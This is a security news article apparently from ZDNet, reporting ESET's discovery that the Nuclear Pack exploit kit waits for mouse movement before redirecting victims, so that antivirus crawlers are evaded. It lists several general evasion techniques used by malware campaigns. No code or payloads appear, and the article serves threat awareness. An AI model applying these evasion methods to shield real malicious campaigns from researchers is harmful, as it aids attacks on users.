Nuclear Pack exploit kit introduces anti-honeyclient crawling feature

Summary:While profiling yet another malware and exploits serving malicious campaign, security researchers from ESET have stumbled upon a new feature introduced in the Nuclear Pack web malware exploitation kit.

For years, the security community has been developing efficient ways to evaluate the maliciousness of as many web sites as possible, by crawling them for malicious content in an automated fashion. Thanks to the  rise of botnets as an exploitation platform, today's cybercriminals are largely relying on compromised legitimate infrastructure as a delivery vehicle for their malicious content, compared to using purely malicious sites as an infection/propagation vector.

Naturally, cybercriminals keep track of the latest anti-malware security research, and constantly adapt to the latest innovations by introducing new features within the most widely used web malware exploitation kits.

According to security researchers from ESET, while profiling yet another malware and exploits serving malicious campaign, they have stumbled upon a new feature introduced in the Nuclear Pack web malware exploitation kit.

More details:

We have tracked some interesting activity through the injected code block with iFrame redirection: Javascript code is used to capture mouse activity with the onmousemove event and only after that does malicious activity continue with the redirection. This activity enabled us to identify a simple method being used to bypass crawlers used by AV companies and others. These are the first steps towards the criminal’s proactive detection of real user activity for tracking detections and bypassing malware collecting by whitehat crawlers.

The new feature is just the tip of the iceberg. Here are some of the most common evasive techniques used by cybercriminals to prevent vendors and security researchers from analyzing their campaigns:

  • The use of session-based cookies
  • The use of HTTP referrers to ensure the exploitation chain is complete
  • The use of banned IPs of known security vendor netblocks
  • The use of OS fingerprinting/browser fingerprinting techniques
  • The serving of malicious content only once for a given IP address
  • Managed iFrame and JavaScript crypting/obfuscating services, dynamically introducing scripts with low-detection rates

For the time being, the most widely used web malware exploitation kit remains the Black Hole exploit kit. Only time will tell whether its author will introduce the anti-crawling feature in the exploit kit, but given the fact that they introduce newly released exploits in a timely manner, it may already be on the of the "to-do" list of the cybercriminal behind the kit.

Topics: Security, Networking


Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, and cybercrime incident response. He's been an active security blogger since 2007, and maintains a popular security blog sharing real-time threats intelligence data with the rest of the community... Full Bio

zdnet_core.socialButton.googleLabel Contact Disclosure

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Related Stories

The best of ZDNet, delivered

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.